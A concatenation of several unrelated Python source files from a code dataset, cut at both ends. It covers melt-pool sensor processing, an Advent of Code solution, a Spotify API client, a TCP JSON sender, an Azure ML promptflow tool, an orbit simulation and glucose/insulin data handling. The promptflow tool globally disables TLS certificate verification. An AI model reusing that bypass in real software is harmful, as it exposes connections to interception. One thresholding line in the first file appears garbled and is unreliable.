df_camera['y'] = y_array\n x_array_mm, y_array_mm = bit2mm(df_camera['x'],df_camera['y'])\n df_camera['x_mm'] = x_array_mm\n df_camera['y_mm'] = y_array_mm\n df_camera['pyro_value'] = pyro_value_array\n \n return(df_camera, df_pyro, results)\n\n\ndef slope_error(dc, dp):\n \"\"\"\n Compute the error of the slope function. c = camera, p = pyrometer\n \"\"\"\n delta_dc = math.sqrt(2)\n delta_dp = math.sqrt(2)\n dp_err = (1/dc)*delta_dp\n dc_err = (dp/(dc**2))*(-1)*delta_dc\n slope_err = math.sqrt(dp_err**2 + dc_err**2)\n return(slope_err)\n\ndef plot_data(df_camera, df_pyro, results, selection):\n \"\"\"\n Generate plots from the data generated during the sensor data processing.\n \"\"\"\n part = df_camera[\"part\"][1]\n layer = df_camera[\"layer\"][1]\n if selection[0]:\n # Plot the results of the CMOS ON/OFF detection\n fig, ax = plt.subplots(figsize=(8,5))\n line1, = ax.plot(df_camera[\"intensity\"],color=\"cornflowerblue\",label=\"intensity\")\n line2 = ax.axhline(df_camera[\"threshold\"][1], color=\"navy\",label=\"intensity threshold\")\n x = results[\"camera_midpoints\"]\n y = np.ones(len(x)) * df_camera['threshold'][1]\n line3 = ax.scatter(x,y,c=\"green\",label=\"midpoints\")\n ax.set_ylabel(\"Intensity\")\n ax.set_xlabel(\"image number\")\n ax2 = ax.twinx()\n line4, = ax2.plot(df_camera[\"ON_OFF\"],color=\"orangered\",label=\"ON / OFF\")\n ax2.set_ylabel(\"OFF / ON\")\n ax.legend(handles=[line1,line2,line3,line4],loc=0)\n ax.set_title(\"ON/OFF detection of CMOS image: \" +\n \"PART {} | LAYER {}\".format(part, layer))\n plt.show()\n if selection[1]:\n # Plot the results of the pyro velocity ON/OFF detection\n fig, ax = plt.subplots()\n line1, = ax.plot(df_pyro[\"velocity\"],color=\"cornflowerblue\",label=\"velocity\")\n line2 = ax.axhline(df_pyro[\"threshold\"][1], color=\"navy\",label=\"scan speed parameter\")\n x = results[\"pyro_midpoints\"]\n y = np.ones(len(x)) * df_pyro['threshold'][1]\n line3 = ax.scatter(x,y,c=\"darkgreen\",label=\"midpoints\")\n ax.set_ylabel(\"velocity [mm/s]\")\n ax.set_xlabel(\"measurement number\")\n ax2 = ax.twinx()\n line4, = ax2.plot(df_pyro[\"ON_OFF\"],color=\"orangered\",label=\"ON / OFF\")\n ax2.set_ylabel(\"OFF / ON\")\n ax.set_title(\"ON/OFF detection of pyro velocity: \" +\n \"PART {} | LAYER {}\".format(part, layer))\n plt.show()\n if selection[2]:\n # Compare the results from the two ON/OFF detections\n fig, ax = plt.subplots()\n line1 = ax.plot(df_camera['index_pyro'],df_camera['ON_OFF'],color=\"navy\",label=\"CMOS camera\")\n ax.set_ylabel(\"OFF / ON\")\n ax.set_xlabel(\"pyrometer measurement index\")\n ax2 = ax.twinx()\n line2 = ax2.plot(df_pyro['ON_OFF'],color=\"orangered\",label=\"pyrometer 1\")\n ax2.set_ylabel(\"OFF / ON\")\n # These lines are required to get one combined legend\n line_sum = line1 + line2\n labels = [line.get_label() for line in line_sum]\n ax.legend(line_sum, labels, loc=0)\n ax.set_title(\"ON/OFF detection comparison: \" +\n \"PART {} | LAYER {}\".format(part, layer))\n plt.show()\n if selection[3]:\n # show images at their x & y positions with their intensity\n fig, ax = plt.subplots()\n ax.scatter(df_camera[\"x_mm\"], df_camera[\"y_mm\"],c=df_camera[\"intensity\"],\n cmap=\"inferno\")\n ax.set_title(\"CMOS image position with image intensity: \" +\n \"PART {} | LAYER {}\".format(part, layer))\n ax.set_xlabel(\"x position [mm] in machine coordinates\")\n ax.set_ylabel(\"y position [mm] in machine coordinates\")\n spacing=1\n x_grid_locator = MultipleLocator(spacing)\n y_grid_locator = MultipleLocator(spacing)\n ax.xaxis.set_minor_locator(x_grid_locator)\n ax.yaxis.set_minor_locator(y_grid_locator)\n ax.grid(True,which='minor')\n ax.axes.set_aspect('equal')\n plt.show()\n if selection[4]:\n # show images at their x & y positions with ON / OFF detection\n fig, ax = plt.subplots()\n df_camera_ON = df_camera.loc[df_camera['ON_OFF'] == 1.0]\n df_camera_OFF = df_camera.loc[df_camera['ON_OFF'] == 0.0]\n ax.set_xlabel(\"x\")\n ax.set_ylabel(\"y\")\n ax.scatter(df_camera_ON[\"x_mm\"], df_camera_ON[\"y_mm\"], c=\"darkorange\", \n alpha=0.5, label=\"ON\")\n ax.scatter(df_camera_OFF[\"x_mm\"], df_camera_OFF[\"y_mm\"], c=\"slategray\",\n alpha=0.5, label=\"OFF\")\n ax.legend()\n ax.set_title(\"CMOS image position with ON/OFF detection: \" +\n \"PART {} | LAYER {}\".format(part, layer))\n ax.set_xlabel(\"x position [mm] in machine coordinates\")\n ax.set_ylabel(\"y position [mm] in machine coordinates\")\n spacing=1\n x_grid_locator = MultipleLocator(spacing)\n y_grid_locator = MultipleLocator(spacing)\n ax.xaxis.set_minor_locator(x_grid_locator)\n ax.yaxis.set_minor_locator(y_grid_locator)\n ax.grid(True,which='minor')\n ax.axes.set_aspect('equal')\n plt.show()\n\n if selection[5]:\n # plot vector length(camera delta) vs. slope as scatterplot\n fig,ax = plt.subplots()\n \n # calculate the average slope\n slope_total=0\n weight_total=0\n for index, slope in enumerate(results[\"slopes\"]):\n weight = results[\"camera_delta\"][index]\n slope_weighted = slope * weight\n slope_total+=slope_weighted\n weight_total+=weight\n slope_average=slope_total/weight_total\n # compute theoretical errors for each camera delta\n camera_delta_all = range(int(min(results[\"camera_delta\"])), \n int(max(results[\"camera_delta\"]))+1, 1)\n vector_error_all = []\n for camera_delta in camera_delta_all:\n pyro_delta=slope*camera_delta\n vector_error_all.append(slope_error(camera_delta,pyro_delta))\n # add errorbars to plot\n ax.errorbar(camera_delta_all,\n np.full(len(camera_delta_all), slope_average),\n yerr=vector_error_all,c=\"orange\",label=\"theoretical errors\",\n fmt='none',capsize=4,zorder=1)\n # add data points to the plot\n ax.scatter(results[\"camera_delta\"],results[\"slopes\"], c=\"navy\",\n label=\"scan vectors\",zorder=3)\n # show average slope value\n ax.axhline(slope_average,color=\"orange\",label=\"average scaling factor\",\n linestyle=\"--\",zorder=2)\n ax.set_xlabel(\"vector length [CMOS images]\")\n ax.set_ylabel(\"Scaling factor [pyrometer data points / CMOS image]\")\n ax.legend()\n ax.set_title(\"Evaluation of scan vector scaling: \" +\n \"PART {} | LAYER {}\".format(part, layer))\n plt.show()\n\n if selection[6]:\n # plot melt pool area vs. pyrometer value\n fig,ax = plt.subplots()\n x = df_camera['meltpool_area']\n y = df_camera['pyro_value']\n ax.scatter(x,y)\n ax.set_xlabel(\"meltpool area\")\n ax.set_ylabel(\"pyrometer value\")\n ax.legend()\n plt.show()\n\n if selection[7]:\n # plot CMOS 2D and pyro-value 2D in adjacent plots\n fig,(ax1,ax2) = plt.subplots(1,2)\n ax1.scatter(df_camera[\"x_mm\"], df_camera[\"y_mm\"], c=df_camera[\"intensity\"],\n cmap=\"inferno\")\n ax1.set_title(\"CMOS images intensity @ position\")\n ax1.set_xlabel(\"x position [mm] in machine coordinates\")\n ax1.set_ylabel(\"y position [mm] in machine coordinates\")\n x,y = bit2mm(df_pyro[\"x\"], df_pyro[\"y\"])\n ax2.scatter(x,y, c = df_pyro[\"intensity\"],\n cmap=\"inferno\")\n ax2.set_title(\"Pyrometer measurements @ position\")\n ax2.set_xlabel(\"x position [mm] in machine coordinates\")\n ax2.set_ylabel(\"y position [mm] in machine coordinates\")\n spacing=1\n x_grid_locator = MultipleLocator(spacing)\n y_grid_locator = MultipleLocator(spacing)\n ax1.xaxis.set_minor_locator(x_grid_locator)\n ax1.yaxis.set_minor_locator(y_grid_locator)\n ax1.grid(True,which='minor')\n ax1.axes.set_aspect('equal')\n x_grid_locator = MultipleLocator(spacing)\n y_grid_locator = MultipleLocator(spacing)\n ax2.xaxis.set_minor_locator(x_grid_locator)\n ax2.yaxis.set_minor_locator(y_grid_locator)\n ax2.grid(True,which='minor')\n ax2.axes.set_aspect('equal')\n plt.show()\n\ndef display_image(image):\n \"\"\"\n Display an image. This is a helper function meant for debugging.\n \"\"\"\n pylab.imshow(image, cmap=\"Greys_r\", vmin=0, vmax=255)\n pylab.show()\n\ndef area_image(image, threshold):\n \"\"\"\n Convert grayscale image to purely black/white according to the threshold.\n \"\"\"\n image[image=threshold] = 1\n # compute a melt pool image based on the area calculation\n converted_image = image* 255\n return(converted_image)\n\ndef normalized_image(image, maximum):\n \"\"\"\n Normalize a grey scale image with a maximum value.\n \"\"\"\n multiplicator = 255 / maximum\n out_image = np.round(image * multiplicator).astype(np.uint8)\n return(out_image)\n\ndef bit2mm(x, y, fieldsize=600, sl2=True):\n \"\"\"\n Transform two arrays x,y of distance data from bit to mm\n \"\"\"\n x_mm = x\n y_mm = y\n\n if sl2:\n\n scaling = (float(fieldsize) / 2.0) / 524287.0 # The scaling according to the protocol (20 bits, signed).\n\n x_mm = - x * scaling\n y_mm = y * scaling\n\n else:\n\n scaling = float(fieldsize) / 32768.0 # The scaling according to the protocol (16 bits, signed).\n\n x_mm = - (x + 16384) * scaling\n y_mm = (y + 16384) * scaling\n\n return (x_mm, y_mm)\n\ndef load_processed(file: str):\n \"\"\"\n Check if a file has already been processed before and return a Dataframe if\n that is the case.\n \"\"\"\n # handle CMOS data files\n if file.endswith('.mkv'):\n try:\n df = pandas.read_pickle(file.replace('.mkv','.pkl'))\n return(True, df)\n except FileNotFoundError:\n return(False, pandas.DataFrame())\n # handle pyrometer data files\n elif file.endswith('.pcd'):\n try:\n df = pandas.read_pickle(file.replace('.pcd','.pkl'))\n return(True, df)\n except FileNotFoundError:\n return(False, pandas.DataFrame())\n else:\n raise FileNotFoundError\n\n\ndef main():\n if cherrypick:\n file_list = create_file_list(job_name, cherry=cherry)\n else:\n file_list = create_file_list(job_name)\n for file in file_list:\n # Fetch and process pyro data from the .pcd file\n preexists, pyro1_df = load_processed(file['filename_pyro1'])\n if not preexists:\n if verbal == True:\n print(\"Started processing: \" + file['filename_pyro1'])\n tstart = time.time()\n pyro1_df = process_pcd(file)\n if verbal:\n print(\"Process finished in {0} seconds\".format(time.time()-tstart))\n\n # Fetch and process images form the .mkv file\n preexists, image_df = load_processed(file['filename_camera'])\n if not preexists:\n if verbal == True:\n print(\"Started processing: \" + file['filename_camera'])\n tstart = time.time()\n image_df = process_mkv(file)\n if verbal:\n print(\"Process finished in {0} seconds\".format(time.time()-tstart))\n\n\n # fit pyro & CMOS data\n image_df,pyro1_df,results = extend_CMOS_data(image_df, pyro1_df)\n # store image dataframe with correlated coordinates\n filename_pkl = file['filename_camera'].replace(\".mkv\",\".pkl\")\n image_df.to_pickle(filename_pkl)\n # todo: store results to access later if required.\n # plot results\n plot_data(image_df,pyro1_df,results, visual)\n\nif __name__ == \"__main__\":\n main()","repo_name":"makraft/CMOS_processor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":28284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1591994497","text":"# AOC 2019 - Day 3\n# tags: #set #direction\n\nimport time\n\nIN_File = \"AOC2019/03.txt\"\nDIRS = {'U':[-1,0],'R':[0,1],'D':[1,0],'L':[0,-1]}\n\ndef parse():\n with open(IN_File) as f:\n out = f.read().split('\\n')\n lines = [[],[]]\n for idx,wire in enumerate(out):\n x,y = 0,0\n for dir in wire.split(','):\n d,m = dir[0],int(dir[1:])\n for pnt in range(1,m+1):\n x += DIRS[d][0]\n y += DIRS[d][1]\n lines[idx].append(tuple([x,y]))\n\n return lines\n\n\ndef part1(data): # 1519\n intersection_distance = 999999\n intersections = list(set(data[0]) & set(data[1]))\n\n for a in intersections:\n distance = abs(a[0]) + abs(a[1])\n intersection_distance = min([intersection_distance,distance])\n\n return intersection_distance\n\ndef part2(data): # 14358\n intersections = list(set(data[0]) & set(data[1]))\n shortest_steps = 999999\n\n for x in intersections:\n distance = data[0].index(x) + data[1].index(x)\n shortest_steps = min([shortest_steps,distance])\n\n return shortest_steps + 2\n\nif __name__ == \"__main__\":\n timestart = time.time()\n\n data = parse()\n\n print(\"part 1:\",part1(data))\n print(\"part 2:\",part2(data))\n\n timeend = time.time()\n print(\"Execution time: \", \"{:.4f}\".format(round(timeend-timestart,7)))","repo_name":"n7tms/AOC","sub_path":"AOC2019/03.py","file_name":"03.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27333360274","text":"# import requests\nimport requests\nfrom dotenv import load_dotenv\nimport json\nimport os\nimport base64\nimport datetime\nfrom urllib.parse import urlencode\nfrom fastapi import FastAPI, Request\nfrom fastapi.responses import HTMLResponse\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.templating import Jinja2Templates\nfrom pydantic import BaseModel\nfrom fastapi.responses import RedirectResponse\nfrom application import config\n\nload_dotenv()\n\napp = FastAPI()\nsettings = config.get_settings()\n\n@app.get(\"/home\")\ndef homepage():\n return {\"hello\": \"world\"}\n\nclient_id = os.getenv(\"CLIENT_ID\")\nclient_secret = os.getenv(\"CLIENT_SECRET\")\n\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\ntemplates = Jinja2Templates(directory=\"templates\")\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def read_item(request: Request):\n return templates.TemplateResponse(\"home.html\", {\"request\": request})\n\n@app.get(\"/typer\")\nasync def redirect_typer():\n return RedirectResponse(\"https://typer.tiangolo.com\")\n\n \nclass SpotifyAPI(object):\n access_token = None\n access_token_expires = datetime.datetime.now()\n access_token_did_expire = True\n client_id = None\n client_secret = None\n token_url = \"https://accounts.spotify.com/api/token\"\n\n \n def __init__(self, client_id, client_secret, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.client_id = client_id\n self.client_secret = client_secret\n\n def get_client_credentials(self):\n \"\"\"\n Returns a base64 encoded string\n \"\"\"\n client_id = self.client_id\n client_secret = self.client_secret\n if client_secret == None or client_id == None:\n raise Exception(\"You must set client_id and client_secret\")\n client_creds = f\"{client_id}:{client_secret}\"\n client_creds_b64 = base64.b64encode(client_creds.encode())\n return client_creds_b64.decode()\n \n def get_token_headers(self):\n client_creds_b64 = self.get_client_credentials()\n return {\n \"Authorization\": f\"Basic {client_creds_b64}\",\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n \n def get_token_data(self):\n return {\n \"grant_type\": \"client_credentials\"\n }\n \n def perform_auth(self):\n token_url = self.token_url\n token_data = self.get_token_data()\n token_headers = self.get_token_headers()\n r = requests.post(token_url, data=token_data, headers=token_headers)\n if r.status_code not in range(200, 299):\n raise Exception(\"Could not authenticate client.\")\n data = r.json()\n now = datetime.datetime.now()\n access_token = data['access_token']\n expires_in = data['expires_in'] # seconds\n expires = now + datetime.timedelta(seconds=expires_in)\n self.access_token = access_token\n self.access_token_expires = expires\n self.access_token_did_expire = expires < now\n return True\n \n def get_access_token(self):\n token = self.access_token\n expires = self.access_token_expires\n now = datetime.datetime.now()\n if expires < now:\n self.perform_auth()\n return self.get_access_token()\n elif token == None:\n self.perform_auth()\n return self.get_access_token()\n return token\n \n def get_resource_header(self):\n access_token = self.get_access_token()\n headers = {\n \"Authorization\": f\"Bearer {access_token}\"\n }\n return headers\n \n def get_resource(self, lookup_id, resource_type='albums', version='v1'):\n endpoint = f\"https://api.spotify.com/{version}/{resource_type}/{lookup_id}\"\n headers = self.get_resource_header()\n r = requests.get(endpoint, headers=headers)\n if r.status_code not in range(200, 299):\n return {}\n return r.json()\n \n \n def get_artist(self, _id):\n return self.get_resource(_id, resource_type=\"artists\") \n \n def base_search(self, query_params):\n headers = self.get_resource_header()\n endpoint = \"https://api.spotify.com/v1/search\"\n lookup_url = f\"{endpoint}?{query_params}\"\n print(lookup_url)\n r = requests.get(lookup_url, headers=headers)\n print(r.status_code)\n if r.status_code not in range(200, 209):\n return {}\n return r.json()\n \n def search(self, query=None, search_type=\"artists\"):\n if query == None:\n raise Exception(\"A query is required\")\n if isinstance(query, dict):\n query = \" \".join([f\"{k}:{v}\" for k, v in query.items()])\n query_params = urlencode({\"q\": query , \"type\": search_type.lower()})\n print(query_params)\n return self.base_search(query_params)\n\n \n\nspotify = SpotifyAPI(client_id, client_secret) \n#print(spotify.perform_auth())\nprint(spotify.get_access_token())\n#print(spotify.search(\"Time\", search_type=\"Track\"))\n#print(spotify.get_artist(\"0TnOYISbd1XYRBk9myaseg\"))\n#access_token = spotify.access_token\n#print(access_token)\n#print(spotify.search({\"track\": \"Time\"}, search_type=\"track\"))\n\n\n\n\n\n\n","repo_name":"honeysaxena/metrics","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10627478535","text":"\nimport socket \nimport json\nimport time\n\nsettings = {\n 'host': '127.0.0.1',\n 'port': 9091\n}\n\ndata = {\n 'category': 'Test',\n 'name': \"Henrique Yukio Murata\",\n 'counter': 1\n}\n\ndef create_tcp_connection():\n try:\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client_socket.connect((settings['host'], settings['port']))\n print(f'Conectado a {settings[\"host\"]}:{settings[\"port\"]}')\n return client_socket\n except socket.error as e:\n print(f'Falha ao se conectar com {settings[\"host\"]}:{settings[\"port\"]}')\n print(e)\n return None\n\ndef sendData(client_socket):\n try:\n json_data = json.dumps(data)\n encoded_json = (json_data+'\\n').encode('utf-8')\n client_socket.send(encoded_json)\n print('Envio do json por UDP bem sucedido')\n data['counter'] = data['counter'] + 1\n time.sleep(5)\n \n except socket.error as e:\n print(['Falha ano envio do json por UDP'])\n print(e)\n client_socket.close()\n create_tcp_connection()\n \nclient_socket = None\nclient_socket = create_tcp_connection()\nwhile True:\n sendData(client_socket)\n\n\n\n","repo_name":"HeyYukio/TCP-Json","sub_path":"SendJsonDummy.py","file_name":"SendJsonDummy.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20671881985","text":"from promptflow import tool\nimport urllib.request\nimport json\nimport os\nimport ssl\n\ndef allowSelfSignedHttps(allowed):\n # bypass the server certificate verification on client side\n if allowed and not os.environ.get('PYTHONHTTPSVERIFY', '') and getattr(ssl, '_create_unverified_context', None):\n ssl._create_default_https_context = ssl._create_unverified_context\n\nallowSelfSignedHttps(True) # this line is needed if you use self-signed certificate in your scoring service.\n\n\n@tool\ndef my_python_tool(short_description: str, headline: str) -> str:\n \n\n data = {\"inputs\": {\"input_signature1\": [short_description], \"input_signature2\":[headline] }}\n\n body = str.encode(json.dumps(data))\n\n ##### IMPORTANT: Replace this with the URL for your endpoint #####\n url = 'https://endpoint.westeurope.inference.ml.azure.com/score'\n\n # Replace this with the primary/secondary key or AMLToken for the endpoint\n api_key = '111111111111111111111111111111111'\n if not api_key:\n raise Exception(\"A key should be provided to invoke the endpoint\")\n\n ### IMPORTANT: Replace 'fine-tuned-bert-news-classific-1' with the name of your model deployment ###\n headers = {'Content-Type':'application/json', 'Authorization':('Bearer '+ api_key), 'azureml-model-deployment': 'fine-tuned-bert-news-classific-1' }\n\n req = urllib.request.Request(url, body, headers)\n\n try:\n response = urllib.request.urlopen(req)\n\n result = json.loads(response.read().decode(\"utf8\", 'ignore'))[0][\"0\"]\n print(result)\n except urllib.error.HTTPError as error:\n print(\"The request failed with status code: \" + str(error.code))\n\n print(error.info())\n print(error.read().decode(\"utf8\", 'ignore'))\n result = error.read().decode(\"utf8\", 'ignore')\n\n return result\n","repo_name":"samelhousseini/building_and_refining_llm_solutions","sub_path":"News Classification Flow/bert_fine_tuned.py","file_name":"bert_fine_tuned.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73121964967","text":"# %%\nfrom scipy.integrate import odeint\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\nimport math\n\n# This is an example of using Python calculate and plot the motion of a a mass\n# orbiting another in a central force field.\n# Order of variables in the array u[]:\n# 0: r\n# 1: v_r\n# 2: phi\n# Written by Robert P. Johnson\n\n# Parameters describing the system.\nk = 1.0 # force constant\nMass = 2.0 # first mass\nmass = 1.0 # second mass\nmu = Mass * mass / (Mass + mass) # reduced mass\nalpha = -0.1\n\n# Define the central force function\ndef F(r):\n return -(1.0 + alpha) * k / pow(r, 2.0 + alpha)\n\n\ndef U(r):\n return -k / pow(r, 1.0 + alpha)\n\n\n# Assign initial conditions to the motion.\nr0 = 4.0\nrdot0 = 0.0\nphi0 = 0.0\nLc = math.sqrt(\n mu * pow(r0, 1.0 - alpha) * (1.0 + alpha) * k\n) # Angular momentum for a circular orbit\nL = 0.5 * Lc # Conserved angular momentum\nu0 = [r0, rdot0, phi0] # initial conditions for all 3 variables\n\n# This function gives the time derivative of each of the 3 variables. These follow from the Lagrange equations of motion,\n# taking into account the fact that phi is ignorable, so that pphi=L is constant.\ndef dudt(u, t):\n r = [0.0, 0.0, 0.0]\n r[0] = u[1]\n r[1] = L * L / (mu * mu * pow(u[0], 3)) + F(u[0]) / mu\n r[2] = L / (mu * u[0] * u[0])\n return r\n\n\ndef h(u):\n return 0.5 * mu * u[1] * u[1] + L * L / (2.0 * mu * u[0] * u[0]) + U(u[0])\n\n\n# Use the scipy odeint routine to carry out the numerical integration of the system of equations.\nt0 = 0.0 # start time\nt1 = 100.0 # end time\nN = 1600 # number of time steps\n\n# Choose a set of time values at which to evaluate the solution y(t)\nt = np.arange(t0, t1, (t1 - t0) / N)\n\n# Call the routing from scipy that does the integration\nu = odeint(dudt, u0, t)\n\nEinitial = h(u0)\nEfinal = h(u[N - 1, ...])\nprint(\"Integration of two-body central force orbits.\")\nprint(\"The potential goes as -1/r^n with n= \" + str(1 + alpha))\nprint(\"The masses are \" + str(Mass) + \" and \" + str(mass))\nprint(\"The initial radius is \" + str(r0))\nprint(\"The initial radial velocity is \" + str(rdot0))\nprint(\"The initial phi angle is \" + str(phi0))\nprint(\"The conserved angular momentum is \" + str(L))\nprint(\"The angular momentum for a circular orbit would be \" + str(Lc))\nprint(str(N) + \" time steps will be taken from time \" + str(t0) + \" to time \" + str(t1))\nprint(\"The initial energy is \" + str(Einitial))\nprint(\"The final energy is \" + str(Efinal))\n\nfont = {\"size\": 18}\nplt.rc(\"font\", **font)\n\n# Use pyplot from matplotlib to plot the relative trajectory\nfig = plt.figure(figsize=(8, 8))\nax = plt.subplot(111, projection=\"polar\")\nax.set_rlabel_position(-22.5)\nax.plot(u[..., 2], u[..., 0])\nax.set_rmax(1.1 * r0)\nplt.tight_layout()\nplt.title(\"Relative Trajectory\")\nplt.show()\n\n# Plot the individual orbits\nfig = plt.figure(figsize=(8, 8))\nax = plt.subplot(111, projection=\"polar\")\nax.plot(u[..., 2], (Mass / (Mass + mass)) * u[..., 0])\nax.plot(u[..., 2] + math.pi, (mass / (Mass + mass)) * u[..., 0])\nax.set_rmax(1.1 * r0)\nplt.title(\"Individual Orbits\")\nplt.show()\n\n# Now use matplotlib to make an animation of the motion\nfig = plt.figure(figsize=(8, 8))\nax = plt.subplot(111, projection=\"polar\")\n(pnt1,) = ax.plot([], [], \"bo\", markersize=12)\n(pnt2,) = ax.plot([], [], \"ro\", markersize=12)\nax.set_rmax(1.1 * r0)\nplt.title(\"Orbit Animation\")\ntime_text = ax.text(0.01, 0.98, \"\", transform=ax.transAxes)\ntime_step = 40.0 * (t1 - t0) / N\n\n\ndef init():\n pnt1.set_data([], [])\n pnt2.set_data([], [])\n time_text.set_text(\"\")\n return pnt1, pnt2, time_text\n\n\ndef animate(i):\n pnt1.set_data(u[i, 2], (Mass / (Mass + mass)) * u[i, 0])\n pnt2.set_data(u[i, 2] + math.pi, (mass / (Mass + mass)) * u[i, 0])\n time = i * time_step\n time_text.set_text(\"time=%.1f ms\" % time)\n return pnt1, pnt2, time_text\n\n\n# The animation is created here\nanim = animation.FuncAnimation(\n fig, animate, init_func=init, frames=N, interval=time_step, blit=False\n)\n\n# Save the animation to an mpeg file. This requires ffmpeg to be installed,\n# with the executable in the PATH\n# This takes a lot of CPU time, so don't do it when it is not needed.\n# anim.save('TimeOrbit.mp4', fps=30, extra_args=['-vcodec', 'libx264'])\n\n# Display the animation\nplt.show()\n# %%\n","repo_name":"Drixitel/Scientific-Computing","sub_path":"physics/mech/orbits.py","file_name":"orbits.py","file_ext":"py","file_size_in_byte":4279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31634632724","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[214]:\n\n\nimport datetime as datetime\nimport pandas as pd\nimport numpy as np\nimport csv\nfrom math import log\n\nfrom sklearn.utils import shuffle\nimport matplotlib.pyplot as plt \nfrom sklearn.cluster import KMeans\nfrom sklearn import metrics\nfrom sklearn.cluster import DBSCAN \nfrom sklearn.neighbors import NearestNeighbors\nfrom sklearn.preprocessing import StandardScaler \nfrom sklearn.preprocessing import normalize\nfrom sklearn.metrics import confusion_matrix\nfrom scipy.stats import entropy\n#from scipy.special import entr\nfrom sklearn.decomposition import PCA \nfrom scipy.stats import entropy\n\n\ncgm_data = pd.read_csv('CGMData.csv')\ncgm_data2 = pd.read_csv('CGMData670GPatient2.csv')\n\ncgm_data.columns = [c.replace(' ', '_') for c in cgm_data.columns]\ncgm_data2.columns = [c.replace(' ', '_') for c in cgm_data2.columns]\n\ncgm = cgm_data[[\"Date\", \"Time\", \"Sensor_Glucose_(mg/dL)\"]]\ncgm2 = cgm_data2[[\"Date\", \"Time\", \"Sensor_Glucose_(mg/dL)\"]]\n\ncgm[\"Time\"] = cgm[\"Date\"] + ' ' + cgm[\"Time\"]\ncgm2[\"Time\"] = cgm2[\"Date\"] + ' ' + cgm2[\"Time\"]\n\ncgm[\"Time\"] = cgm[\"Time\"].astype(\"datetime64[ns]\")\ncgm = cgm[['Time', 'Sensor_Glucose_(mg/dL)']]\n\ncgm2[\"Time\"] = cgm2[\"Time\"].astype(\"datetime64[ns]\")\ncgm2 = cgm2[[\"Time\", \"Sensor_Glucose_(mg/dL)\"]]\n\ncgm = cgm.set_index(\"Time\")\ncgm2 = cgm2.set_index(\"Time\")\n\ncgm = cgm.iloc[::-1]\ncgm2 = cgm2.iloc[::-1]\n\n\n# In[215]:\n\n\ninsulin_data = pd.read_csv(\"InsulinData.csv\")\ninsulin_data2 = pd.read_csv(\"InsulinAndMealIntake670GPatient3.csv\")\n\ninsulin_data.columns = [c.replace(' ', '_') for c in insulin_data.columns]\ninsulin_data2.columns = [c.replace(' ', '_') for c in insulin_data2.columns]\n\ninsulin = insulin_data[[\"Date\", \"Time\", \"BWZ_Carb_Input_(grams)\"]]\ninsulin2 = insulin_data2[[\"Date\", \"Time\", \"BWZ_Carb_Input_(grams)\"]]\n\ninsulin[\"Time\"] = insulin[\"Date\"] + ' ' + insulin[\"Time\"]\ninsulin2[\"Time\"] = insulin2[\"Date\"] + ' ' + insulin2[\"Time\"]\n\ninsulin[\"Time\"] = insulin[\"Time\"].astype(\"datetime64[ns]\")\ninsulin2[\"Time\"] = insulin2[\"Time\"].astype(\"datetime64[ns]\")\n\ninsulin = insulin[[\"Time\", \"BWZ_Carb_Input_(grams)\"]]\ninsulin2 = insulin2[[\"Time\", \"BWZ_Carb_Input_(grams)\"]]\n#print(insulin.head(50))\n\ninsulin = insulin.set_index(\"Time\")\ninsulin2 = insulin2.set_index(\"Time\")\n\ninsulin.columns = ['data']\ninsulin2.columns = ['data']\n\ninsulin = insulin.iloc[::-1]\ninsulin2 = insulin2.iloc[::-1]\n\n\n\n# In[216]:\n\n\nmeal_Time = pd.DataFrame(columns = ['startTime', 'endTime'])\nnoMeal_Time = pd.DataFrame(columns = ['startTime', 'endTime'])\n\nyValue = pd.DataFrame(columns =['startTime', 'endTime', 'YValue'])\n\n\n# In[217]:\n\n\nif pd.isnull(insulin.iloc[0,0]):\n startTime = insulin.index[0]\n endTime = startTime + pd.offsets.Minute(120)\n curr = pd.DataFrame()\n i = 0\n \n while ((endTime < insulin.index[len(insulin)-1]) & (i < 41434)):\n curr = insulin[(insulin.index >= startTime)]\n curr = curr[(curr.index < endTime)]\n hasMeal = False\n \n if ((pd.notnull(curr['data'])) & (curr['data'] != 0)).any():\n hasMeal = True\n \n if (hasMeal == False):\n noMeal_Time = noMeal_Time.append({'startTime': startTime, 'endTime': endTime}, ignore_index=True)\n startTime = endTime\n endTime = startTime + pd.offsets.Minute(120)\n \n elif (hasMeal == True):\n mealNext = True\n while ((mealNext == True) & (endTime < insulin.index[len(insulin)-1])):\n mealNext = False\n for j in range(len(curr)):\n if ((pd.notnull(curr.iloc[j,0])) and (curr.iloc[j,0] != 0)):\n startTime = curr.index[j]\n startMThirty = startTime - pd.offsets.Minute(30)\n endTime = startTime + pd.offsets.Minute(120)\n y_Val = curr.iloc[j,0]\n\n curr = insulin[(insulin.index > startTime)]\n curr = curr[(curr.index < endTime)]\n \n if ((pd.notnull(curr['data'])) & (curr['data'] != 0)).any():\n mealNext = True\n #meal_Time = meal_Time.append({'startTime': startMThirty, 'endTime': endTime}, ignore_index=True)\n yValue = yValue.append({'startTime': startMThirty, 'endTime': endTime, 'YValue': y_Val}, ignore_index=True)\n i = i + 1\n startTime = endTime\n endTime = startTime + pd.offsets.Minute(120)\n\n\n# In[218]:\n\n\n#print(yValue)\nmeal_Time2 = pd.DataFrame(columns = ['startTime', 'endTime'])\nnoMeal_Time2 = pd.DataFrame(columns = ['startTime', 'endTime'])\nyValue2 = pd.DataFrame(columns =['startTime', 'endTime', 